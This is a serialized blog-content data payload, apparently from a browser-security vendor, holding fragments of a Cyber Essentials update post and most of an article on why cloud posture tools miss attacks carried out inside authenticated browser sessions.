service.",{"url":27940,"width":27941,"height":27942},"https://images.ctfassets.net/y1cdw1ablpvd/1Kn7L6pvmeNtC5SLOL92Af/4311c559323df3613d7ed2038bf6a50a/image1_6.png",1504,816,{"sys":27944,"__typename":5434,"title":27945,"arcadeDemoUrl":27946,"playText":27947},{"id":27435},"Solving Shadow SaaS & MFA Gaps","https://demo.arcade.software/P3zLqR7AyL98bziCV7b4?embed","1 mins",{"sys":27949,"__typename":5345,"title":27950,"caption":27950,"layoutMode":118,"file":27951},{"id":27481},"There are 100s of apps in use across an enterprise, resulting in 1000s of accounts (we see an average of 15x accounts per employee).",{"url":27952,"width":5358,"height":6852},"https://images.ctfassets.net/y1cdw1ablpvd/7Bsch6QgVymNTG3rAhlDP3/2288395e281255e6826314ed84618a27/image2_3.png",{"sys":27954,"__typename":5345,"title":27955,"caption":27955,"layoutMode":118,"file":27956},{"id":27534},"Ghost logins enable attackers to bypass secure authentication methods. ",{"url":27957,"width":5358,"height":27958},"https://images.ctfassets.net/y1cdw1ablpvd/2disLRprEmiYXBc5B9ekJl/8ce8faba41e94b95672a8275e173e4bf/image6_1.png",1139,{"sys":27960,"__typename":5311,"content":27961,"name":28009,"title":118},{"id":27578},{"json":27962},{"nodeType":165,"data":27963,"content":27964},{},[27965],{"nodeType":178,"data":27966,"content":27967},{},[27968,27972,27977,27981,27986,27990,27995,27999,28006],{"nodeType":173,"value":27969,"marks":27970,"data":27971},"Combining the ",[],{},{"nodeType":173,"value":27973,"marks":27974,"data":27976},"lack of SSO support",[27975],{"type":370},{},{"nodeType":173,"value":27978,"marks":27979,"data":27980}," with the ",[],{},{"nodeType":173,"value":27982,"marks":27983,"data":27985},"ease of self adoption",[27984],{"type":370},{},{"nodeType":173,"value":27987,"marks":27988,"data":27989}," and issue of ",[],{},{"nodeType":173,"value":27991,"marks":27992,"data":27994},"concurrent login methods",[27993],{"type":370},{},{"nodeType":173,"value":27996,"marks":27997,"data":27998},", we're in a world where passwords aren't going anywhere fast. And if you think your employees are using only one password at best (to log into their enterprise SSO) ",[],{},{"nodeType":186,"data":28000,"content":28001},{"uri":4492},[28002],{"nodeType":173,"value":28003,"marks":28004,"data":28005},"you're in for a big surprise",[],{},{"nodeType":173,"value":2340,"marks":28007,"data":28008},[],{},"Cyber Essentials Insight Box 3",{"sys":28011,"__typename":5345,"title":28012,"caption":28012,"layoutMode":118,"file":28013},{"id":27622},"Account management requirements.",{"url":28014,"width":5358,"height":28015},"https://images.ctfassets.net/y1cdw1ablpvd/50nkfseFjz2aJQlZLoNCpO/fd883edf749f715ac7d0b52774873f36/image5_5.png",1156,{"sys":28017,"__typename":5345,"title":28018,"caption":28018,"layoutMode":118,"file":28019},{"id":27628},"Password policy requirements.",{"url":28020,"width":5358,"height":28021},"https://images.ctfassets.net/y1cdw1ablpvd/fwBDarwTnB8YJ7VQrFQqa/8b9a6a22f9ac62ff4b4716b155403a3d/image3_8.png",951,{"sys":28023,"__typename":5345,"title":28024,"caption":28024,"layoutMode":118,"file":28025},{"id":27634},"Third-party requirements.",{"url":28026,"width":28027,"height":28028},"https://images.ctfassets.net/y1cdw1ablpvd/6ulZcdHXvmr15qEeNdFaol/de23532bbb2502a7084dbdbdd9e61e7d/image7_3.png",1234,552,{"sys":28030,"__typename":5345,"title":28031,"caption":28031,"layoutMode":118,"file":28032},{"id":27658},"Microsoft Entra and Okta SSO dashboard examples.",{"url":28033,"width":5358,"height":28034},"https://images.ctfassets.net/y1cdw1ablpvd/3KhjNWelYkdooqHcZsJwgX/51ada3120e9ed0188ef195fbb2819870/image4.png",680,{"sys":28036,"__typename":5311,"content":28037,"name":28059,"title":118},{"id":27741},{"json":28038},{"nodeType":165,"data":28039,"content":28040},{},[28041],{"nodeType":178,"data":28042,"content":28043},{},[28044,28048,28056],{"nodeType":173,"value":28045,"marks":28046,"data":28047},"You can read more about these Scattered Lapsus$ Hunters attacks and the bigger picture ",[],{},{"nodeType":186,"data":28049,"content":28050},{"uri":5002},[28051],{"nodeType":173,"value":28052,"marks":28053,"data":28055},"here",[28054],{"type":194},{},{"nodeType":173,"value":1477,"marks":28057,"data":28058},[],{},"Cyber Essentials Insight Box 2",{"sys":28061,"__typename":15269,"type":15270,"ctaText":28062,"buttonLabel":87,"buttonColour":15273,"buttonUrl":27851},{"id":27153},"Get our whitepaper to learn how attackers are exploiting MFA gaps and what security teams can do about it","content:blog:cyber-essentials-april-2026-update.json","blog/cyber-essentials-april-2026-update.json","blog/cyber-essentials-april-2026-update",{"_path":28067,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":28068,"ogImage":118,"summary":28070,"title":6651,"subtitle":118,"metaTitle":6651,"synopsis":28081,"hashTags":118,"publishedDate":28082,"slug":6652,"tagsCollection":28083,"relatedBlogPostsCollection":28089,"authorsCollection":28884,"content":28888,"_id":29271,"_type":5439,"_source":5440,"_file":29272,"_stem":29273,"_extension":5439},"/blog/push-plus-cloud-security",{"id":2058,"publishedAt":28069},"2026-02-06T16:45:21.455Z",{"json":28071},{"data":28072,"content":28073,"nodeType":165},{},[28074],{"data":28075,"content":28076,"nodeType":178},{},[28077],{"data":28078,"marks":28079,"value":28080,"nodeType":173},{},[],"One of the key questions we often hear is, \"We've already got CSPM/CNAPP, so why do we need to be in the browser too?\" Well, here's the answer!","Why cloud security tools only give you part of the picture when it comes to modern attacks. ","2026-02-06T00:00:00.000Z",{"items":28084},[28085,28087],{"sys":28086,"name":505},{"id":504},{"sys":28088,"name":509},{"id":508},{"items":28090},[28091,28538],{"__typename":1528,"sys":28092,"content":28093,"title":6643,"synopsis":26089,"hashTags":118,"publishedDate":25584,"slug":6644,"tagsCollection":28528,"authorsCollection":28534},{"id":2023},{"json":28094},{"data":28095,"content":28096,"nodeType":165},{},[28097,28104,28110,28116,28126,28133,28139,28145,28151,28158,28161,28168,28174,28180,28186,28201,28206,28212,28227,28234,28342,28345,28352,28358,28368,28374,28379,28385,28391,28398,28404,28411,28417,28423,28429,28471,28481,28517,28522],{"data":28098,"content":28099,"nodeType":169},{},[28100],{"data":28101,"marks":28102,"value":25611,"nodeType":173},{},[28103],{"type":370},{"data":28105,"content":28106,"nodeType":178},{},[28107],{"data":28108,"marks":28109,"value":25618,"nodeType":173},{},[],{"data":28111,"content":28112,"nodeType":178},{},[28113],{"data":28114,"marks":28115,"value":25625,"nodeType":173},{},[],{"data":28117,"content":28118,"nodeType":178},{},[28119,28122],{"data":28120,"marks":28121,"value":25632,"nodeType":173},{},[],{"data":28123,"marks":28124,"value":25637,"nodeType":173},{},[28125],{"type":370},{"data":28127,"content":28128,"nodeType":235},{},[28129],{"data":28130,"marks":28131,"value":25645,"nodeType":173},{},[28132],{"type":370},{"data":28134,"content":28135,"nodeType":178},{},[28136],{"data":28137,"marks":28138,"value":25652,"nodeType":173},{},[],{"data":28140,"content":28141,"nodeType":178},{},[28142],{"data":28143,"marks":28144,"value":25659,"nodeType":173},{},[],{"data":28146,"content":28147,"nodeType":178},{},[28148],{"data":28149,"marks":28150,"value":25666,"nodeType":173},{},[],{"data":28152,"content":28153,"nodeType":178},{},[28154],{"data":28155,"marks":28156,"value":25674,"nodeType":173},{},[28157],{"type":370},{"data":28159,"content":28160,"nodeType":231},{},[],{"data":28162,"content":28163,"nodeType":169},{},[28164],{"data":28165,"marks":28166,"value":25685,"nodeType":173},{},[28167],{"type":370},{"data":28169,"content":28170,"nodeType":178},{},[28171],{"data":28172,"marks":28173,"value":25692,"nodeType":173},{},[],{"data":28175,"content":28176,"nodeType":178},{},[28177],{"data":28178,"marks":28179,"value":25699,"nodeType":173},{},[],{"data":28181,"content":28182,"nodeType":178},{},[28183],{"data":28184,"marks":28185,"value":25706,"nodeType":173},{},[],{"data":28187,"content":28188,"nodeType":178},{},[28189,28192,28198],{"data":28190,"marks":28191,"value":25713,"nodeType":173},{},[],{"data":28193,"content":28194,"nodeType":186},{"uri":8987},[28195],{"data":28196,"marks":28197,"value":8157,"nodeType":173},{},[],{"data":28199,"marks":28200,"value":25723,"nodeType":173},{},[],{"data":28202,"content":28205,"nodeType":312},{"target":28203},{"sys":28204},{"id":25728,"type":317,"linkType":318},[],{"data":28207,"content":28208,"nodeType":178},{},[28209],{"data":28210,"marks":28211,"value":25736,"nodeType":173},{},[],{"data":28213,"content":28214,"nodeType":178},{},[28215,28218,28224],{"data":28216,"marks":28217,"value":25743,"nodeType":173},{},[],{"data":28219,"content":28220,"nodeType":186},{"uri":5002},[28221],{"data":28222,"marks":28223,"value":25750,"nodeType":173},{},[],{"data":28225,"marks":28226,"value":25754,"nodeType":173},{},[],{"data":28228,"content":28229,"nodeType":178},{},[28230],{"data":28231,"marks":28232,"value":25762,"nodeType":173},{},[28233],{"type":1646},{"data":28235,"content":28236,"nodeType":1653},{},[28237,28258,28279,28300,28321],{"data":28238,"content":28239,"nodeType":1657},{},[28240,28249],{"data":28241,"content":28242,"nodeType":1661},{},[28243],{"data":28244,"content":28245,"nodeType":178},{},[28246],{"data":28247,"marks":28248,"value":25778,"nodeType":173},{},[],{"data":28250,"content":28251,"nodeType":1661},{},[28252],{"data":28253,"content":28254,"nodeType":178},{},[28255],{"data":28256,"marks":28257,"value":25788,"nodeType":173},{},[],{"data":28259,"content":28260,"nodeType":1657},{},[28261,28270],{"data":28262,"content":28263,"nodeType":1687},{},[28264],{"data":28265,"content":28266,"nodeType":178},{},[28267],{"data":28268,"marks":28269,"value":25801,"nodeType":173},{},[],{"data":28271,"content":28272,"nodeType":1687},{},[28273],{"data":28274,"content":28275,"nodeType":178},{},[28276],{"data":28277,"marks":28278,"value":25811,"nodeType":173},{},[],{"data":28280,"content":28281,"nodeType":1657},{},[28282,28291],{"data":28283,"content":28284,"nodeType":1687},{},[28285],{"data":28286,"content":28287,"nodeType":178},{},[28288],{"data":28289,"marks":28290,"value":25824,"nodeType":173},{},[],{"data":28292,"content":28293,"nodeType":1687},{},[28294],{"data":28295,"content":28296,"nodeType":178},{},[28297],{"data":28298,"marks":28299,"value":25834,"nodeType":173},{},[],{"data":28301,"content":28302,"nodeType":1657},{},[28303,28312],{"data":28304,"content":28305,"nodeType":1687},{},[28306],{"data":28307,"content":28308,"nodeType":178},{},[28309],{"data":28310,"marks":28311,"value":25847,"nodeType":173},{},[],{"data":28313,"content":28314,"nodeType":1687},{},[28315],{"data":28316,"content":28317,"nodeType":178},{},[28318],{"data":28319,"marks":28320,"value":25857,"nodeType":173},{},[],{"data":28322,"content":28323,"nodeType":1657},{},[28324,28333],{"data":28325,"content":28326,"nodeType":1687},{},[28327],{"data":28328,"content":28329,"nodeType":178},{},[28330],{"data":28331,"marks":28332,"value":25870,"nodeType":173},{},[],{"data":28334,"content":28335,"nodeType":1687},{},[28336],{"data":28337,"content":28338,"nodeType":178},{},[28339],{"data":28340,"marks":28341,"value":25880,"nodeType":173},{},[],{"data":28343,"content":28344,"nodeType":231},{},[],{"data":28346,"content":28347,"nodeType":169},{},[28348],{"data":28349,"marks":28350,"value":25891,"nodeType":173},{},[28351],{"type":370},{"data":28353,"content":28354,"nodeType":178},{},[28355],{"data":28356,"marks":28357,"value":25898,"nodeType":173},{},[],{"data":28359,"content":28360,"nodeType":178},{},[28361,28364],{"data":28362,"marks":28363,"value":25905,"nodeType":173},{},[],{"data":28365,"marks":28366,"value":25910,"nodeType":173},{},[28367],{"type":370},{"data":28369,"content":28370,"nodeType":178},{},[28371],{"data":28372,"marks":28373,"value":25917,"nodeType":173},{},[],{"data":28375,"content":28378,"nodeType":312},{"target":28376},{"sys":28377},{"id":25922,"type":317,"linkType":318},[],{"data":28380,"content":28381,"nodeType":178},{},[28382],{"data":28383,"marks":28384,"value":25930,"nodeType":173},{},[],{"data":28386,"content":28387,"nodeType":178},{},[28388],{"data":28389,"marks":28390,"value":25937,"nodeType":173},{},[],{"data":28392,"content":28393,"nodeType":235},{},[28394],{"data":28395,"marks":28396,"value":25945,"nodeType":173},{},[28397],{"type":370},{"data":28399,"content":28400,"nodeType":178},{},[28401],{"data":28402,"marks":28403,"value":25952,"nodeType":173},{},[],{"data":28405,"content":28406,"nodeType":178},{},[28407],{"data":28408,"marks":28409,"value":25960,"nodeType":173},{},[28410],{"type":370},{"data":28412,"content":28413,"nodeType":178},{},[28414],{"data":28415,"marks":28416,"value":25967,"nodeType":173},{},[],{"data":28418,"content":28419,"nodeType":178},{},[28420],{"data":28421,"marks":28422,"value":25974,"nodeType":173},{},[],{"data":28424,"content":28425,"nodeType":178},{},[28426],{"data":28427,"marks":28428,"value":25981,"nodeType":173},{},[],{"data":28430,"content":28431,"nodeType":250},{},[28432,28445,28458],{"data":28433,"content":28434,"nodeType":254},{},[28435],{"data":28436,"content":28437,"nodeType":178},{},[28438,28442],{"data":28439,"marks":28440,"value":25995,"nodeType":173},{},[28441],{"type":370},{"data":28443,"marks":28444,"value":25999,"nodeType":173},{},[],{"data":28446,"content":28447,"nodeType":254},{},[28448],{"data":28449,"content":28450,"nodeType":178},{},[28451,28455],{"data":28452,"marks":28453,"value":26010,"nodeType":173},{},[28454],{"type":370},{"data":28456,"marks":28457,"value":26014,"nodeType":173},{},[],{"data":28459,"content":28460,"nodeType":254},{},[28461],{"data":28462,"content":28463,"nodeType":178},{},[28464,28468],{"data":28465,"marks":28466,"value":26025,"nodeType":173},{},[28467],{"type":370},{"data":28469,"marks":28470,"value":26029,"nodeType":173},{},[],{"data":28472,"content":28473,"nodeType":178},{},[28474,28477],{"data":28475,"marks":28476,"value":26036,"nodeType":173},{},[],{"data":28478,"marks":28479,"value":26041,"nodeType":173},{},[28480],{"type":370},{"data":28482,"content":28483,"nodeType":3769},{},[28484],{"data":28485,"content":28486,"nodeType":178},{},[28487,28490,28496,28499,28505,28508,28514],{"data":28488,"marks":28489,"value":3925,"nodeType":173},{},[],{"data":28491,"content":28492,"nodeType":186},{"uri":1456},[28493],{"data":28494,"marks":28495,"value":3932,"nodeType":173},{},[],{"data":28497,"marks":28498,"value":2936,"nodeType":173},{},[],{"data":28500,"content":28501,"nodeType":186},{"uri":3941},[28502],{"data":28503,"marks":28504,"value":3944,"nodeType":173},{},[],{"data":28506,"marks":28507,"value":3949,"nodeType":173},{},[],{"data":28509,"content":28510,"nodeType":186},{"uri":1469},[28511],{"data":28512,"marks":28513,"value":1472,"nodeType":173},{},[],{"data":28515,"marks":28516,"value":1477,"nodeType":173},{},[],{"data":28518,"content":28521,"nodeType":312},{"target":28519},{"sys":28520},{"id":25575,"type":317,"linkType":318},[],{"data":28523,"content":28524,"nodeType":178},{},[28525],{"data":28526,"marks":28527,"value":37,"nodeType":173},{},[],{"items":28529},[28530,28532],{"sys":28531,"name":505},{"id":504},{"sys":28533,"name":509},{"id":508},{"items":28535},[28536],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":28537},{"url":25597},{"__typename":1528,"sys":28539,"content":28540,"title":6647,"synopsis":25583,"hashTags":118,"publishedDate":25584,"slug":6648,"tagsCollection":28874,"authorsCollection":28880},{"id":2044},{"json":28541},{"data":28542,"content":28543,"nodeType":165},{},[28544,28551,28557,28563,28573,28583,28590,28596,28602,28608,28613,28616,28623,28629,28635,28645,28651,28657,28664,28670,28712,28725,28731,28738,28744,28766,28772,28779,28821,28827,28863,28868],{"data":28545,"content":28546,"nodeType":169},{},[28547],{"data":28548,"marks":28549,"value":25212,"nodeType":173},{},[28550],{"type":370},{"data":28552,"content":28553,"nodeType":178},{},[28554],{"data":28555,"marks":28556,"value":25219,"nodeType":173},{},[],{"data":28558,"content":28559,"nodeType":178},{},[28560],{"data":28561,"marks":28562,"value":25226,"nodeType":173},{},[],{"data":28564,"content":28565,"nodeType":178},{},[28566,28569],{"data":28567,"marks":28568,"value":25233,"nodeType":173},{},[],{"data":28570,"marks":28571,"value":25238,"nodeType":173},{},[28572],{"type":370},{"data":28574,"content":28575,"nodeType":178},{},[28576,28579],{"data":28577,"marks":28578,"value":25245,"nodeType":173},{},[],{"data":28580,"marks":28581,"value":25250,"nodeType":173},{},[28582],{"type":1646},{"data":28584,"content":28585,"nodeType":235},{},[28586],{"data":28587,"marks":28588,"value":25258,"nodeType":173},{},[28589],{"type":370},{"data":28591,"content":28592,"nodeType":178},{},[28593],{"data":28594,"marks":28595,"value":25265,"nodeType":173},{},[],{"data":28597,"content":28598,"nodeType":178},{},[28599],{"data":28600,"marks":28601,"value":25272,"nodeType":173},{},[],{"data":28603,"content":28604,"nodeType":178},{},[28605],{"data":28606,"marks":28607,"value":25279,"nodeType":173},{},[],{"data":28609,"content":28612,"nodeType":312},{"target":28610},{"sys":28611},{"id":25284,"type":317,"linkType":318},[],{"data":28614,"content":28615,"nodeType":231},{},[],{"data":28617,"content":28618,"nodeType":169},{},[28619],{"data":28620,"marks":28621,"value":25296,"nodeType":173},{},[28622],{"type":370},{"data":28624,"content":28625,"nodeType":178},{},[28626],{"data":28627,"marks":28628,"value":25303,"nodeType":173},{},[],{"data":28630,"content":28631,"nodeType":178},{},[28632],{"data":28633,"marks":28634,"value":25310,"nodeType":173},{},[],{"data":28636,"content":28637,"nodeType":178},{},[28638,28642],{"data":28639,"marks":28640,"value":25318,"nodeType":173},{},[28641],{"type":370},{"data":28643,"marks":28644,"value":25322,"nodeType":173},{},[],{"data":28646,"content":28647,"nodeType":178},{},[28648],{"data":28649,"marks":28650,"value":25329,"nodeType":173},{},[],{"data":28652,"content":28653,"nodeType":178},{},[28654],{"data":28655,"marks":28656,"value":25336,"nodeType":173},{},[],{"data":28658,"content":28659,"nodeType":235},{},[28660],{"data":28661,"marks":28662,"value":25344,"nodeType":173},{},[28663],{"type":370},{"data":28665,"content":28666,"nodeType":178},{},[28667],{"data":28668,"marks":28669,"value":25351,"nodeType":173},{},[],{"data":28671,"content":28672,"nodeType":250},{},[28673,28686,28699],{"data":28674,"content":28675,"nodeType":254},{},[28676],{"data":28677,"content":28678,"nodeType":178},{},[28679,28683],{"data":28680,"marks":28681,"value":25365,"nodeType":173},{},[28682],{"type":370},{"data":28684,"marks":28685,"value":25369,"nodeType":173},{},[],{"data":28687,"content":28688,"nodeType":254},{},[28689],{"data":28690,"content":28691,"nodeType":178},{},[28692,28696],{"data":28693,"marks":28694,"value":25380,"nodeType":173},{},[28695],{"type":370},{"data":28697,"marks":28698,"value":25384,"nodeType":173},{},[],{"data":28700,"content":28701,"nodeType":254},{},[28702],{"data":28703,"content":28704,"nodeType":178},{},[28705,28709],{"data":28706,"marks":28707,"value":25395,"nodeType":173},{},[28708],{"type":370},{"data":28710,"marks":28711,"value":25399,"nodeType":173},{},[],{"data":28713,"content":28714,"nodeType":178},{},[28715,28718,28722],{"data":28716,"marks":28717,"value":25406,"nodeType":173},{},[],{"data":28719,"marks":28720,"value":25411,"nodeType":173},{},[28721],{"type":370},{"data":28723,"marks":28724,"value":25415,"nodeType":173},{},[],{"data":28726,"content":28727,"nodeType":178},{},[28728],{"data":28729,"marks":28730,"value":25422,"nodeType":173},{},[],{"data":28732,"content":28733,"nodeType":235},{},[28734],{"data":28735,"marks":28736,"value":25430,"nodeType":173},{},[28737],{"type":370},{"data":28739,"content":28740,"nodeType":178},{},[28741],{"data":28742,"marks":28743,"value":25437,"nodeType":173},{},[],{"data":28745,"content":28746,"nodeType":178},{},[28747,28750,28754,28757,28763],{"data":28748,"marks":28749,"value":25444,"nodeType":173},{},[],{"data":28751,"marks":28752,"value":25449,"nodeType":173},{},[28753],{"type":370},{"data":28755,"marks":28756,"value":25453,"nodeType":173},{},[],{"data":28758,"content":28759,"nodeType":186},{"uri":25456},[28760],{"data":28761,"marks":28762,"value":25461,"nodeType":173},{},[],{"data":28764,"marks":28765,"value":37,"nodeType":173},{},[],{"data":28767,"content":28768,"nodeType":178},{},[28769],{"data":28770,"marks":28771,"value":25471,"nodeType":173},{},[],{"data":28773,"content":28774,"nodeType":235},{},[28775],{"data":28776,"marks":28777,"value":25479,"nodeType":173},{},[28778],{"type":370},{"data":28780,"content":28781,"nodeType":250},{},[28782,28795,28808],{"data":28783,"content":28784,"nodeType":254},{},[28785],{"data":28786,"content":28787,"nodeType":178},{},[28788,28792],{"data":28789,"marks":28790,"value":25493,"nodeType":173},{},[28791],{"type":370},{"data":28793,"marks":28794,"value":25497,"nodeType":173},{},[],{"data":28796,"content":28797,"nodeType":254},{},[28798],{"data":28799,"content":28800,"nodeType":178},{},[28801,28805],{"data":28802,"marks":28803,"value":25508,"nodeType":173},{},[28804],{"type":370},{"data":28806,"marks":28807,"value":25512,"nodeType":173},{},[],{"data":28809,"content":28810,"nodeType":254},{},[28811],{"data":28812,"content":28813,"nodeType":178},{},[28814,28818],{"data":28815,"marks":28816,"value":25523,"nodeType":173},{},[28817],{"type":370},{"data":28819,"marks":28820,"value":25527,"nodeType":173},{},[],{"data":28822,"content":28823,"nodeType":178},{},[28824],{"data":28825,"marks":28826,"value":25534,"nodeType":173},{},[],{"data":28828,"content":28829,"nodeType":3769},{},[28830],{"data":28831,"content":28832,"nodeType":178},{},[28833,28836,28842,28845,28851,28854,28860],{"data":28834,"marks":28835,"value":3925,"nodeType":173},{},[],{"data":28837,"content":28838,"nodeType":186},{"uri":1456},[28839],{"data":28840,"marks":28841,"value":3932,"nodeType":173},{},[],{"data":28843,"marks":28844,"value":2936,"nodeType":173},{},[],{"data":28846,"content":28847,"nodeType":186},{"uri":3941},[28848],{"data":28849,"marks":28850,"value":3944,"nodeType":173},{},[],{"data":28852,"marks":28853,"value":3949,"nodeType":173},{},[],{"data":28855,"content":28856,"nodeType":186},{"uri":1469},[28857],{"data":28858,"marks":28859,"value":1472,"nodeType":173},{},[],{"data":28861,"marks":28862,"value":1477,"nodeType":173},{},[],{"data":28864,"content":28867,"nodeType":312},{"target":28865},{"sys":28866},{"id":25575,"type":317,"linkType":318},[],{"data":28869,"content":28870,"nodeType":178},{},[28871],{"data":28872,"marks":28873,"value":37,"nodeType":173},{},[],{"items":28875},[28876,28878],{"sys":28877,"name":505},{"id":504},{"sys":28879,"name":509},{"id":508},{"items":28881},[28882],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":28883},{"url":25597},{"items":28885},[28886],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":28887},{"url":25597},{"json":28889,"links":29259},{"nodeType":165,"data":28890,"content":28891},{},[28892,28900,28907,28914,28921,28928,28935,28943,28950,28957,28964,28967,28975,28982,28989,28996,29003,29021,29029,29036,29043,29050,29053,29061,29077,29093,29100,29108,29115,29122,29129,29136,29141,29148,29211,29214,29253],{"nodeType":169,"data":28893,"content":28894},{},[28895],{"nodeType":173,"value":28896,"marks":28897,"data":28899},"Cloud security tools ensure secure configurations",[28898],{"type":370},{},{"nodeType":178,"data":28901,"content":28902},{},[28903],{"nodeType":173,"value":28904,"marks":28905,"data":28906},"If you’re a cloud security architect, you probably don’t think in terms of firewalls and perimeters anymore. You think in control planes. Your job isn’t protecting a box or a subnet; it’s governing a sprawling web of IAM roles, service principals, APIs, and permissions that exist mostly as configuration and code. In this world, the boundary isn’t physical or even networked, it’s defined entirely by how your environment is configured.",[],{},{"nodeType":178,"data":28908,"content":28909},{},[28910],{"nodeType":173,"value":28911,"marks":28912,"data":28913},"The way most teams approached that problem was pragmatic. As cloud environments scaled, it became impossible to secure it by inspection or tribal knowledge. Cloud Security Posture Management tools and, later, Cloud Native Application Protection Platforms emerged to solve a very real problem: visibility and control over cloud configuration at scale. They gave teams a way to continuously assess infrastructure, track misconfigurations, and understand risk across accounts, regions, and services without drowning in raw provider logs.",[],{},{"nodeType":178,"data":28915,"content":28916},{},[28917],{"nodeType":173,"value":28918,"marks":28919,"data":28920},"That capability is important. Without it, cloud security simply doesn’t function. ",[],{},{"nodeType":178,"data":28922,"content":28923},{},[28924],{"nodeType":173,"value":28925,"marks":28926,"data":28927},"CSPM and CNAPP answer the question of “is my cloud environment configured securely?”. They tell you whether an IAM role is too permissive, whether a resource is exposed, or whether a policy violates best practice. They tell you when a user or account is trying to do something they shouldn’t. ",[],{},{"nodeType":178,"data":28929,"content":28930},{},[28931],{"nodeType":173,"value":28932,"marks":28933,"data":28934},"What they don’t answer is a different, increasingly important question: “What happens when attacker behavior is indistinguishable from legitimate user behavior?”",[],{},{"nodeType":235,"data":28936,"content":28937},{},[28938],{"nodeType":173,"value":28939,"marks":28940,"data":28942},"But they can’t stop “legitimate” actions",[28941],{"type":370},{},{"nodeType":178,"data":28944,"content":28945},{},[28946],{"nodeType":173,"value":28947,"marks":28948,"data":28949},"The gap (or lack of) between legitimate user behavior and malicious abuse is becoming more relevant as cloud breaches change shape. ",[],{},{"nodeType":178,"data":28951,"content":28952},{},[28953],{"nodeType":173,"value":28954,"marks":28955,"data":28956},"In many of today’s incidents, attackers aren’t exploiting misconfigurations or abusing the cloud control plane directly. They’re compromising users. Once an authentication has occurred through illegitimate means, whether phishing, session hijacking, or token theft, the attacker operates entirely within an approved session.",[],{},{"nodeType":178,"data":28958,"content":28959},{},[28960],{"nodeType":173,"value":28961,"marks":28962,"data":28963},"From the perspective of cloud security tooling, very little looks wrong. The identity is valid. The access patterns appear expected. The infrastructure remains correctly configured. As long as the attacker operates within the bounds of what looks “normal”, no alarms are triggered. Meanwhile, sensitive actions are carried out through the browser, using the same interfaces and workflows as a real user.",[],{},{"nodeType":231,"data":28965,"content":28966},{},[],{"nodeType":169,"data":28968,"content":28969},{},[28970],{"nodeType":173,"value":28971,"marks":28972,"data":28974},"The gap between the IdP and the final API call — the “missing middle” in your security stack",[28973],{"type":370},{},{"nodeType":178,"data":28976,"content":28977},{},[28978],{"nodeType":173,"value":28979,"marks":28980,"data":28981},"The browser session sits outside the telemetry and control model of infrastructure-focused cloud security tools. We call this the \"missing middle.\" It’s the space between the IdP login and the final cloud API call. ",[],{},{"nodeType":178,"data":28983,"content":28984},{},[28985],{"nodeType":173,"value":28986,"marks":28987,"data":28988},"In theory, you could try to close the gap by stitching together logs from every SaaS application in your environment. In practice, anyone who’s attempted this knows how quickly it falls apart. ",[],{},{"nodeType":178,"data":28990,"content":28991},{},[28992],{"nodeType":173,"value":28993,"marks":28994,"data":28995},"Each integration is brittle and expensive to maintain, and many applications don’t expose the level of telemetry you actually need, even if you’re willing to fork out for the top Security++ product tier. When you’re dealing with hundreds of apps per enterprise, each with their own configuration complexity, there’s a good chance that your solution focused on “core” cloud apps doesn’t actually have visibility of the full attack surface.",[],{},{"nodeType":178,"data":28997,"content":28998},{},[28999],{"nodeType":173,"value":29000,"marks":29001,"data":29002},"When logs do exist, they rarely show what you actually need. To a CSPM or CNAPP, it looks like an authorized user doing authorized things. A file was accessed or a setting was changed. What those tools can’t see is that the browser session itself was being manipulated in real time.",[],{},{"nodeType":178,"data":29004,"content":29005},{},[29006,29009,29017],{"nodeType":173,"value":25743,"marks":29007,"data":29008},[],{},{"nodeType":186,"data":29010,"content":29011},{"uri":5002},[29012],{"nodeType":173,"value":29013,"marks":29014,"data":29016},"modern, cloud-native threat groups",[29015],{"type":194},{},{"nodeType":173,"value":29018,"marks":29019,"data":29020},", this lack of session-level visibility is their greatest advantage. They bypass the strong configuration and identity controls you’ve already implemented by simply stepping into the authorized stream. And by the time infrastructure-level signals suggest something is wrong, the attacker has already accomplished what they came for.",[],{},{"nodeType":235,"data":29022,"content":29023},{},[29024],{"nodeType":173,"value":29025,"marks":29026,"data":29028},"Secure everything, still lose",[29027],{"type":370},{},{"nodeType":178,"data":29030,"content":29031},{},[29032],{"nodeType":173,"value":29033,"marks":29034,"data":29035},"At some point, this forces a hard realization: you can do everything “right” at the cloud and identity layers and still lose.",[],{},{"nodeType":178,"data":29037,"content":29038},{},[29039],{"nodeType":173,"value":29040,"marks":29041,"data":29042},"You can lock down infrastructure-as-code, tighten IAM policies, enforce conditional access, and pass every posture check you care about. But none of that changes where access actually happens. When users work in cloud services, they do it through a browser. And once a session is established, that browser session becomes the real control plane.",[],{},{"nodeType":178,"data":29044,"content":29045},{},[29046],{"nodeType":173,"value":29047,"marks":29048,"data":29049},"That’s the shift cloud security teams are running into. The problem isn’t that CSPM or CNAPP failed, it’s that they can’t see the full picture. Bridging the missing middle means treating the browser session itself as something you can inspect and defend.",[],{},{"nodeType":231,"data":29051,"content":29052},{},[],{"nodeType":169,"data":29054,"content":29055},{},[29056],{"nodeType":173,"value":29057,"marks":29058,"data":29060},"Why moving detection and response to the browser is the solution",[29059],{"type":370},{},{"nodeType":178,"data":29062,"content":29063},{},[29064,29068,29073],{"nodeType":173,"value":29065,"marks":29066,"data":29067},"First, ",[],{},{"nodeType":173,"value":29069,"marks":29070,"data":29072},"detection has to move into the browser",[29071],{"type":370},{},{"nodeType":173,"value":29074,"marks":29075,"data":29076},". Modern cloud attacks don’t announce themselves with known indicators or suspicious IPs; it’s all about behavior. A phishing kit rendering inside a login page. A session token being silently exfiltrated. A user interacting with a page that looks legitimate but isn’t. You only see those signals by inspecting the page, the scripts, and the user’s interaction, in real time, inside the tab, before any cloud API ever gets touched.",[],{},{"nodeType":178,"data":29078,"content":29079},{},[29080,29084,29089],{"nodeType":173,"value":29081,"marks":29082,"data":29083},"Second, ",[],{},{"nodeType":173,"value":29085,"marks":29086,"data":29088},"posture can’t stop at the IdP or cloud configuration.",[29087],{"type":370},{},{"nodeType":173,"value":29090,"marks":29091,"data":29092}," It’s not enough to enforce MFA and SSO at a handful of centrally managed apps and assume the rest of the estate follows suit. Shadow SaaS breaks that assumption immediately. Local accounts, duplicate identities, and MFA gaps undermine cloud access controls, even when your AWS or Azure configuration is otherwise airtight. If a sensitive app allows password-only access, that weakness propagates straight back into your cloud environment.",[],{},{"nodeType":178,"data":29094,"content":29095},{},[29096],{"nodeType":173,"value":29097,"marks":29098,"data":29099},"Finally, when something does go wrong, teams need more than a login timestamp and an IP address. They need to know what the user 